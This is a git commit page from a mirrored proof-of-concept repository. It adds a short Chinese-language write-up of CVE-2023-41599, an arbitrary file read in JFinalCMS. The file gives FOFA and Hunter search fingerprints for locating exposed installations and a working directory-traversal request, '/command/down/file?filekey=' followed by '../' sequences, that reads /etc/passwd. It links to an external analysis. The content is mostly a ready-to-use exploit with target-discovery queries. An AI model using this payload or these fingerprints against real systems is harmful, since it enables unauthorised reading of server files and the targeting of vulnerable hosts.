mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
This commit is contained in:
parent
b26e0d9c39
commit
0561f20ed5
23
JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
Normal file
23
JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
|
||||||
|
|
||||||
|
|
||||||
|
## 特征
|
||||||
|
```fofa:
|
||||||
|
|
||||||
|
body="content=\"JreCms"
|
||||||
|
|
||||||
|
hunter:
|
||||||
|
|
||||||
|
web.body="content=\"JreCms"
|
||||||
|
```
|
||||||
|
## POC
|
||||||
|
```
|
||||||
|
Windows: /../../../../../../../../../test.txt
|
||||||
|
Linux: /../../../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
/command/down/file?filekey=/../../../../../../../../../etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞分析
|
||||||
|
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
|
||||||
Loading…
x
Reference in New Issue
Block a user